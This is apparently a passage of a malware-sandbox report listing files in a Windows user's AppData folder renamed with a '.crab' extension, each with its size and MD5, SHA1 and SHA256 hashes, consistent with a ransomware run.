SHA256: 0acf88959fd6d0b83eed505404f3054aeb4efa76852d09cc63aad4fc40f57afb 		False
...
c:\users\nd9e1fyi\appdata\roaming\7y338ww30khw_kvdj.bmp.crab 92.70 KB MD5: 73aa67b6c11cb8e4e3d9a5ae9e12b7db
SHA1: 5e074b352b05c7e0f14cfa90cc39529742370023
SHA256: a9a4fc09573596b03c01eb43953db285750d41ed3cfc34fc5edd3021f96e020f 		False
...
c:\users\nd9e1fyi\appdata\roaming\80naubl1bcqq.mp3.crab 2.52 KB MD5: 2ec9e11e00d2cf8d0c49b4f1e143178f
SHA1: aa0cee6278ad02cf49fb121cc2632fa124bce608
SHA256: 3eb0079a1b3d5a29c7fe1cb0ef849f01f9ff6c7474f39a9ed95069c17f52a9b1 		False
...
c:\users\nd9e1fyi\appdata\roaming\9hqb6.gif.crab 34.05 KB MD5: f19b4b0480a637a87e8e65a12b15987c
SHA1: 2d9bd346f04a49ee8c50811c8ae4e4c4674639a4
SHA256: c7e2b6295b7b77ca2518fef935b429074004e45dd638a5bb08d3608854259c12 		False
...
c:\users\nd9e1fyi\appdata\roaming\ad456ynae.png.crab 31.19 KB MD5: b3e9dec2280047385d315d862dbeed9b
SHA1: ae478640536d46e333c43f2841d23f3e43733d9f
SHA256: 464d2602d76d629350d377995403fd8379c59f32211b8514579f98b66711c4f2 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\addressbook.acrodata.crab 8.20 KB MD5: 9556ec253b68d3316da8ce5805124195
SHA1: 0ae6967e9b17f83525ebd1b2a68dd1bbbbb3bafb
SHA256: e7ea07c3c3edeed4c2390e344c148f2d02f4d960e4de71e5b70c2eb85af03ca4 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.crab 1.14 KB MD5: 77c3dfeb6e7c910439ceb13793412d3a
SHA1: 01db9ff3c4f0644b703d32ca6a8e7b9f2dc323db
SHA256: 693ff4318218952cc39d4c6534eb81e7f2274d3dde4851f77d6a4882923f39b2 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.crab 0.94 KB MD5: 038f0d3fa4f6c30bda347e14daa5d509
SHA1: 3a63eda2be6bbde9ed8e92e299d32c3a070fa80c
SHA256: 1aff34b598561d6a511196a7de352e236109f0578c4912f64b2dac865a0f8f15 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logs\ulog_acrobat12_reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy.crab 23.34 KB MD5: 422c175e6e571cf2e4492c0db57061ee
SHA1: 41bceed183f6ce224cc0dca9d925927dff29db0d
SHA256: 3316929aa2a8d8b7f24d4c2a963b098b542ea55227b541c628393e0565a7ae89 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logtransport2.cfg.crab 0.73 KB MD5: 5dacfa3f9df2e8f4348e0d45e9ceed74
SHA1: 84466badd7fc255dd0ae18bbff5b7340d94b856c
SHA256: 36c7c2d247c0313f9d1d96632ac13286b9ce48b5e424b50967a04fa884777fc8 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.crab 18.84 KB MD5: e65e1a2c9c85016aa94dc6aa760c57e6
SHA1: d9ff601028219fccb785065fd3090fcd50f45e1f
SHA256: aa4a0f0ba0b26ad1dfe2840bf6d04784b8e96c51889200347283b0f8c73cdce3 		False
...
c:\users\nd9e1fyi\appdata\roaming\bc4ck.mp3.crab 50.81 KB MD5: f3e9ec68a907777d38584fbbafa33563
SHA1: adc75a14ca07b283854561c5a71fc609b4cd83d6
SHA256: 3f4a5974e890e7a2423dcca139577b2a4d7277d4e2b24ced7fdab96f1c533987 		False
...
c:\users\nd9e1fyi\appdata\roaming\cx 2hvtjnepkc.mp3.crab 38.58 KB MD5: 2fe501450902ecb586556d3185442805
SHA1: 659e60b75850cf04c0f01734e42f416457731bd6
SHA256: 2d33695032ec3724b21038dc5da2731483ff0b58d40cce695b0bb1f3071347ea 		False
...
c:\users\nd9e1fyi\appdata\roaming\d 3oihehyy3jgx.mp4.crab 87.66 KB MD5: b844612a261fa35f563f6e8fed742891
SHA1: a0f80bc7662764fcaeb715321314b3de15bbd715
SHA256: e80b65c06b5701001337bb24061b55786d0d1e1792cd11861cd7b2987fa77d27 		False
...
c:\users\nd9e1fyi\appdata\roaming\dz28ghwyj9-jvurmnbqv.ots.crab 97.72 KB MD5: 36b6019f59d531e698b09ff9340cab6c
SHA1: 3b86abf0f7962fd32b76222ef324c9a8843a6a12
SHA256: a0328766660c9dc51a52bcd4e4acb62df7ee5d242411eb4915ac541e363c13ee 		False
...
c:\users\nd9e1fyi\appdata\roaming\fezrnjyet8dxbnlxa.mp4.crab 29.58 KB MD5: b1c736b29b0e697b2d0d1090a003aed1
SHA1: 62c0f72a8194fb4d78be4d6f273bd81bbc60d829
SHA256: f10af594f52228588d6867e4fb1bae7ba0a436b1b2a28dc2a4244abaea651a4c 		False
...
c:\users\nd9e1fyi\appdata\roaming\fkoq.odt.crab 85.09 KB MD5: a67864437f7df752af8067739eb9fead
SHA1: 5c68c6248fb43d41c415433277e55d0ad6da4890
SHA256: 87b90562688bebe43710921a5a3ef8b5787ee17ed516a326020b8ebd1337a635 		False
...
c:\users\nd9e1fyi\appdata\roaming\gflne6eca1jmfg6m8.mkv.crab 87.67 KB MD5: 254a59ce4a44e6a2ccddcdcdebd0b2bd
SHA1: 5fa896a2497bcec5a80dcd1e7ca6a719568e088e
SHA256: bab8f84304e72431acadc45dd0348f9da39c723a4e22cc5c785dae5a2d482f18 		False
...
c:\users\nd9e1fyi\appdata\roaming\im-xi-txjujxu8gwjean.avi.crab 51.70 KB MD5: cc02aad286bbc55c846334b9fcf97c23
SHA1: 2bca1d93c5a0921a9d7cc175bbba1128b015d127
SHA256: 8346acc9eb71d7ea8c9e5c6349400f8a3511a3a9c51787ee853b562c84c39c05 		False
...
c:\users\nd9e1fyi\appdata\roaming\ivmnctwjms.swf.crab 98.47 KB MD5: 0ef0cc6639cce2a58068f5728f29cfb8
SHA1: 9984d40ab0cac952cce1567dd572c60c8795873a
SHA256: 36c9e35afb1b56487098e9d116967099c08218dd1379e5f21c41845c6521883a 		False
...
c:\users\nd9e1fyi\appdata\roaming\je8o8wzi8buok7-5nx6.m4a.crab 8.41 KB MD5: d82980ee504e39e8b872bf5c544ded94
SHA1: 67509d96388c9e4549839eb26a2457afba8e6554
SHA256: 8e4af37c3738adaa3e7d8cff2d1100b0b347968265695a47bf6a5a819076a95f 		False
...
c:\users\nd9e1fyi\appdata\roaming\kdoskm.avi.crab 5.95 KB MD5: a7b942969f1bf68b179aeae423e4d378
SHA1: 0630f7af67c4c94dde2d6ad8b8da03c9873a38a6
SHA256: ad084a7dec745f4a3aaee85b041cec212553d93610df37ac680a30dc9425debf 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 1.02 KB MD5: e2206511aff69f5b850d7ee6a919d27f
SHA1: ee4ca5d547dede4f68e1f0800bc49f1c8b25c09d
SHA256: 62d05c8600db2b0702a08a711fba484251fa50f6ee3ac750422c9a0acf04c121 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.31 KB MD5: 61a3ee38ddc2f88dfc40025034077a92
SHA1: fb7e2435fd22aaef4d5b0d7056c8b470208bac10
SHA256: 051b6b195d37c676c45792a492e1a97b887682c33de73ef773fef87d75e4a383 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.58 KB MD5: f46785f453192d5fa1329a94665afe5f
SHA1: 1216204b959550a1a66e271cdb6073f6dacc1e2c
SHA256: 4e598970a4f86cc010ce3b21af510d4b8cea876b3f1a872f7f8fefccecd4f5b4 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.89 KB MD5: 57b717430663f711e0764f54f75b1171
SHA1: be1f3bb094b8f1498be1c1df96440c837dd00da7
SHA256: 153a5e3ce6252846f9523a2478e0ba07ad33477cdf6658f0a5d824e831e75010 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.88 KB MD5: 804d9447d5d2bb18e587d344f3e2dfcb
SHA1: 80a928f7ff94f126a9e65afe6c6f29f211bd5d49
SHA256: 5d6fc9f27eb1eeb05e5009eb9e52b870fa68add981e1e375fb53a321db44ef99 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.08 KB MD5: 3911c8d6204fe569e721de94f0012e17
SHA1: ef594d1e156346303d06abb45abbf01cfe9d7935
SHA256: f01dcde8c722bb53f3870f2ade6d178c6c3484540ed2237e034c55b3c6028c77 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.66 KB MD5: 3839347e1addcada30ca46af95551fb6
SHA1: 820ef21437fb9dfc29447de715c26f5807bf29ed
SHA256: 022bac14a6f2e6627c0123173ade165e6bde76bcf171ba0abaa57b4c1bcf9333 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.14 KB MD5: 0cb7b278cc858433c4a247def784e45a
SHA1: 77cd02cb67c5dce7d59716b98ccf3646a55d2331
SHA256: 001ed2b3f7bf57a61394d678d8e65a7fd20d16d26291355528b5cb7410093ea5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.83 KB MD5: 355bff6c28a5f7534daa0d8acb1b5081
SHA1: 131cbc60972f1e53ba414340850852e0d7a60c92
SHA256: 8d85ac523e6689458187382686ea77a4e749d1b862e588e24fd8a73bf976e565 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 213.00 KB MD5: d49957312865f0a5b9da55be60742991
SHA1: 7dc3002b0834874fc99ac7c06a1bd8a5402bc82f
SHA256: 96fc0864f529925fc710d58015cea830e68dcf982f8a1990ed99f6a7ca405d4e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.77 KB MD5: 84908043b8b4075593e2354ab53eba99
SHA1: 9262318a94cea1501eea1db22543e7d8e3acb989
SHA256: ba45ccf8eb13d6870268d83c2ee6965340570ab76de31cef292fab83d8c93cf9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.97 KB MD5: e912d2fc3c9283572d218869dd8502f3
SHA1: 6399f35b2bc5412e5854e3d2ceb800997a4eec44
SHA256: 6d505e8e8d511f7a25d837c39f70e70fe5322a1e660833efe5cbcde776567fb0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.11 KB MD5: a1c6df9aa0c2e4d5a7d0fff984a16941
SHA1: 614c5eb554473012e2d12a1753b97ba3d00d9807
SHA256: ea2d96a2846045199eddd79e4f3800cdaab5b068c6b292ea58755174aef5b096 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: 03571da0bb80d64c6740abdc86f2747d
SHA1: 82e22d7a3c682d859a6098623b9232a94c26e2ea
SHA256: 307be3c2c5dffc70e0cef6bd9cc3ab84177c4bd7bdabdf7ce92cb39758cd59a8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\mso1033.acl.crab 37.38 KB MD5: 2ad3ef61650d42d6cd1e7d4d32a0bb41
SHA1: d6d2c8dd5bf597ac2b789c73537c9fc49969693b
SHA256: 25ecd528bab6b79c7dc44ac022195582f25b70563d12c8d8884508d468270df4 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\con2.lnk.crab 0.80 KB MD5: cf34cf8fb6e6d884e433b5105620ad94
SHA1: abcb1662e23aab31e092cc3b2989a578d9195fdc
SHA256: 5b6224b3b725d33d463e8ab7b3292e8ab272a2bc859aaa83aa660b674c174457 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\index.dat.crab 0.58 KB MD5: dd7637e5fad846ea1a9abc0da1a6a582
SHA1: e1e0bb8eb5d3a288e07f15e0705dda3720b18e8d
SHA256: 5ffe4661bf10d535e4213fd173a822e1a8e6bc8e9652fb23db661340836cc55f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.67 KB MD5: 8e3a05c869f45c42ed7d70d9edb95c80
SHA1: 582593ada3ec554cf46769497cb93d3730ccc3b8
SHA256: f1579d60c5b585d2b8d4f6f89b15bc4830baf59d196d53ddbe3ed5e9007d2b4f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.02 KB MD5: 2b615e096959c120e49b3c6795053480
SHA1: f2979cfb451dd8ac49867873f1843522b6605813
SHA256: a5d74a406637373b6913bdae41df22a769a624762fecaa1f6095dc38b3f260ca 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.81 KB MD5: 880b40cb7fda6e0c947f93d6f7d8295b
SHA1: fdff6cfca149248f52f19db1cb5964e40730ecf3
SHA256: 6b0e1782869f48951063dea5df7f8d4cb413e396a6048c7626020205089eecb0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.69 KB MD5: 4dd2a758d59783a4eeb09cc3a04a622d
SHA1: 4e29aaca232e12721b3bd53f9faa4c0c968a41ba
SHA256: ca4ab65f795c9cdaf35fc89fe26f483b915aaf34d0357d8b7ec15e532ba31a3f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\cashflow analysis.xltm.crab 371.62 KB MD5: 6fbf4a75f316ffa5c06bd1d6e930d2b4
SHA1: 422d43d07965de56ea41654652cd4d661267df42
SHA256: 30b29fbd1522924f3957dbdc63701c9f2f23791b3b14d8944e9f2eddfe61f7ec 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02836342[[fn=ion]].thmx.crab 1.74 MB MD5: de55d6587353d6bf651d31e57e39d9dc
SHA1: 470b17d26e4275bec3c555a1222676d91f509895
SHA256: c72b4845be666875977b608ae528ae63da2fa059d5ab535e734e09d89ebddadb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02892315[[fn=wisp]].thmx.crab 769.42 KB MD5: 96a1156f8b5fc937b9438013329b178e
SHA1: e48ad051719a7e83e1c61b2b44d27d393220c49b
SHA256: 0a66e6b45d194c7f73c84179bef2ec5460b4526a98106c376c12305337c538cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900688[[fn=facet]].thmx.crab 721.64 KB MD5: e6e7256fb78bdae9a6b2c9ace28befbd
SHA1: d5961f2e7e829be513061d5464993ec9beb55438
SHA256: a40560a001a8d7604c55f22615157f5d4c62126cbde19264d77a5535c1db5b5a 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900771[[fn=slice]].thmx.crab 845.06 KB MD5: cadb3c0da30291f89e092a5e02640bd0
SHA1: 8e76338061d3597f0b9794e634ca1a15c98b06f5
SHA256: df069e21bccf11b24ea9adc1d153086a1ccb634f5278fe7047c4cb29b450de40 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090430[[fn=banded]].thmx.crab 549.47 KB MD5: 81ef9a9b98cb8bde4b6f2773a49b5109
SHA1: 24437f20e0bb9c77326cb6b08ff67de466ab1795
SHA256: 2c65398b797782dbda743edf269d5ee1a24540b65437d37896ae435af8413bd1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx.crab 1.57 MB MD5: c1587dbe39c33e5bbbe5baad4186f86c
SHA1: 4785766c81ee062924ebdc9086971fdfadef8fba
SHA256: 38aa5633e615b85cb386d7e860b02414e5a32f28e0decc73c90d6f85e8eb97d1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx.crab 545.48 KB MD5: 9e11fde89f689aa45e7f07013490b150
SHA1: 95f7f286411b5a11bdb3833932a315bf0fe0b678
SHA256: 224f658a958eadff784baea8710f1849017b31d1a75eb0b377b701e64baead51 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx.crab 558.05 KB MD5: 76051fa29994c47ed57de1bb58d1ff6c
SHA1: 3d84055384400a9b11d045b127b9fe17d343347e
SHA256: 4d3c3b324b7cad1ad828ce043f1b1d7ee376ad673673d49df58d451dc05752d5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx.crab 511.31 KB MD5: b8a5cd8176c89adc3a4a2193363e526b
SHA1: 89900d82dd654072ab503cfde4eaeb40509728ec
SHA256: 9c68e2acd9e948583e47cbfce132330279e89f256786b8842b7f6ca8c3044f14 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx.crab 2.94 MB MD5: f32b086c758f97a8a0bb563ee69e4b63
SHA1: 1d409d3907633a2e27bcc17d4c48a7f1eb781f71
SHA256: 6b6a783f9d5b827382a314e986ed85da31ced3b15f63d7612907ee457956a479 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx.crab 759.94 KB MD5: 3e8cae1f2393464a34304036dba60940
SHA1: d37c5d8ed5894482a76090989993436891bf6e3c
SHA256: fb624f682c47a2436917519ed5276fcfeb5fc1d47e2000d2170fc7e5372bf673 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx.crab 903.53 KB MD5: d83998fdc7808e89dfe49d74095695ce
SHA1: d254449176173cf448bd35d5712a4d8b3aa6f477
SHA256: 1f5b9e9180c1c85f6618dc8ce67f5b4926b7f8a0f682434ad5979b8d7972ded2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx.crab 944.81 KB MD5: 2df1f26ee11ea5b50f80a441a9e731be
SHA1: 978732ff8c2cef5e3b5ca75b870fc64a50c10891
SHA256: 3bd8c57275a9e130e4ee82307266b8b03e478d13984807ca074f0d060d1718c9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx.crab 1.15 MB MD5: 75ca266e3f3744d3fa062938118a607e
SHA1: 5d699a89ef8627a1fed8b69c72a329ce2ce3e28d
SHA256: 7573db225fed45775ef359c2af5092cdaa0ece59cc0c2bb373c1e7b46ecdf990 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx.crab 475.72 KB MD5: ea3ce48fb687aed6551a5a06374da0f1
SHA1: cc603efec870ecec299af84ac10ee3a214db3374
SHA256: 33bee6160e3856a28b21d054286efcadc93641945eb98433cde11c226e0684c1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx.crab 953.66 KB MD5: 8a820622207844e096523f1393cdae03
SHA1: 14a9aa68d0f51c6f2e92c6ccbe4ee9e06a727cdb
SHA256: 8cafd429239e4a4249f961da17f8e10699406f1ed7a719dcb99f9d8b926248d7 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx.crab 1.40 MB MD5: 4199138446736e1d694428c3eeae187d
SHA1: b476989fd42a8126cf61821b66147753a4567de6
SHA256: f85935c1c1a7e3594d542f1dfba95941e361fb10edfafe753e6b7dbadbe8b2d2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx.crab 2.12 MB MD5: 334003e3df3ca09c1540157cd4158114
SHA1: ae1490e95ee5061599003a39fc724f4d4fd604c2
SHA256: e742b597c04f5484202e8d7854bd777f16c96e98241a3cc00ae89a4a1c64624c 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx.crab 1.67 MB MD5: 34efa048b3ea9ebd0f9a1b2f1f37cd85
SHA1: 02950b2a44a2972b2d69afdc266bf50fef730ad9
SHA256: 4d223b5e94dab1176ac233043fd51750064212940d265b99e3c439ef5c516711 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx.crab 2.79 MB MD5: 71e673229d545afcd21d0e9eabff13e4
SHA1: 98ba76cba61fddc2f606443df931f07255c3223f
SHA256: 8e1b79a3213495106d1eb8192f083c7860378d49b6056a478aa84b0401ce184e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx.crab 2.25 MB MD5: 140c122d2ab26e66817b466057e3e2cd
SHA1: 3cc83dff9bf971c5e6998ae560e4a953af99a788
SHA256: 7d7005ccc956843608a7769e6dabfa4bf8d5daa3d1be1406ff48cabfccd1a0f1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx.crab 3.44 MB MD5: 6caabb81f15acdbe301f98beaa14ddd6
SHA1: 5b12a4305f7c414f41896ca2f9eabbfeb7a14472
SHA256: d21c0832a97db8966be533ffe1b3e40310a23c5de9f7cfbda389357bc0be7f8b 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx.crab 527.48 KB MD5: 77772fdda18533fb399d31a79b5bd41e
SHA1: 93c58461bbadf31716de1c0664c4c4e617cf7e85
SHA256: 0ffc7ee508c3fbf97a3e797ca314e5170049315a560cee0a11b4040d84bc45ef 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx.crab 1.96 MB MD5: 13d3b94fc0d7f2c3f6bf1af906f3de06
SHA1: 9a7ab73c4fbd36429ee0ec30b72be0de0639f6c7
SHA256: 187f252095ef5fd6c4635efc0d37e8e4cbe672cfa6b0ebfc07568427e6c641ee 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx.crab 524.55 KB MD5: a658ab33e435b66271ff2735070bc1ae
SHA1: 3bf521890aedc02e37ce1ae90156e6cc5a3d2675
SHA256: 098370223da5fe1d7e241a5572cf485d3ffa525622241c67b655eafe55fcb5d6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx.crab 1.04 MB MD5: 0e137e1a97d9ece35730a1bcc5c725e4
SHA1: 091f9b513026a523221524ba9c647866334ab79e
SHA256: cef0ceb911413c1d37ed2bb2dca1843bca1270ee45852b2d0e100358de6982e5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx.crab 594.39 KB MD5: aae7bfa272d494f8a82fb221e38c6152
SHA1: bb22016a715ba32cf1bb3855d15daad070ebee11
SHA256: 4e1c176116fd1c184456cbc72f5a9ae28ac423b7b766f54c02e99505137b5230 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm16401371[[fn=atlas]].thmx.crab 838.08 KB MD5: 089003123a93a54095b84c782d64cc0d
SHA1: f052a9cbb0bfc268d99eb2460563b52a9b8c454f
SHA256: 12f1e3598c7bea2668f7fcf6e28401c14b71996cf821d494e93ba39240a1013f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox.crab 6.17 KB MD5: c8ccb0a33a1e89dbae2b8a2c80dfbb54
SHA1: 49c842e354f3f3e945d4cc9c63cb76123911d05d
SHA256: ba0f111a8bfb4b89e0e14e2a311ba0373f347f8885c48b5515550053b0c719e9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox.crab 4.45 KB MD5: ac89297bf30514673fe1965b317310f8
SHA1: c599ede6b5c90303e53edd11452da9af15b1749d
SHA256: 566af0bc0d7c2537f74cb82bd8b1d261329c1828cc9af022f930bde043502424 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox.crab 4.67 KB MD5: ee0ad0d74bc343bb765993d1e1927715
SHA1: 0413b48c305fb886df035054555a734d90cd5712
SHA256: dc41363805e06bf8192b53d2874b5bcbf673b784c6ecbbc2a41a717152e0f3d0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox.crab 16.94 KB MD5: c73c05a2b3d08f3c835e46022e6a0995
SHA1: 01fad837e31568dd910860ca806513d060c22ab4
SHA256: b9dcd3cbc5850bd8cd3dca901035e17c037194f787db7ea23c191bde84a3dbf6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox.crab 11.64 KB MD5: 8d05ce5a1d952e77a66b7745521c9a4e
SHA1: 7a724bfa431318a9f2c5e1a5053e94d5374fd0d5
SHA256: d5dff5e3ebb526a3bc72bd6e842269a55ec3bbf222f3dcbda6e659a4b5b83ad3 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox.crab 6.41 KB MD5: 8c99449400a45e9860609fb3ed01c5d2
SHA1: f0b667e7c29495a3b28fea23ea0cb11e72312288
SHA256: 16c30fde40e946ea1533e2b31b7de34d039b375abf93b3e25ec33b726b2b94c5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox.crab 9.50 KB MD5: b95e65f7df800345595d282671783967
SHA1: 2d6593fab6565a1b77a87e298e55fa3cd5e82907
SHA256: 659b1be0f0e31374485765126ca102fcef1dac8a742b54993e64e9192486991d 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox.crab 4.75 KB MD5: ed2268e6b7d03e19b10bc51cbe48dfee
SHA1: 6be77f4cd704e4322d8371413bd4eb5ac4a8ee88
SHA256: 8b80d60311bdf13af368abc18be54f1e4d02e51ba2561c6f6ffcd5d724f0228d 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox.crab 7.72 KB MD5: 8b843a80f395b6d6c95278f33d963dc2
SHA1: 9c6e8529d59af49bc428eb27fb1884413d95c052
SHA256: 7705434148324bb8554deee1b4546563653933962f8e75ca070ae641073607f7 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox.crab 5.98 KB MD5: 53a3b1d5f08fc78d58f7a329b24c12f0
SHA1: 2aa4a8e306629ccde7bee321602fc2d3d6b1d055
SHA256: c5d06fab058d226bc0c7f01b404fa0e9f1bdcf602ee5c8ec0629d39e99eda707 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox.crab 4.12 KB MD5: 7e32ad78273a5800adcbac60ed9086a1
SHA1: 0a020eb56ab0b3de706b6e7d5af9beb7aaa03690
SHA256: dd80735eba4ded6b972e6b1c55b177efe94b326e8dd06698ff3748365eab2fb5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox.crab 5.30 KB MD5: c3d72112eda09f922641157694a0e612
SHA1: 50511a09958d40049549fefe2bd5c5b975616bfe
SHA256: 4e8e5ac549866c26c81e947952a3ed965bd5f0d6e4092b18fe2de37f5940d240 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox.crab 6.81 KB MD5: bb2d0dc89e3924acd43385d5249aa377
SHA1: ac603d8e4aa8bc5c79bda9b07bdcdea2ff93d918
SHA256: 8219e86680e9d0264519035febab5c01c80590cc1fd474e678e372114a252280 		False
...
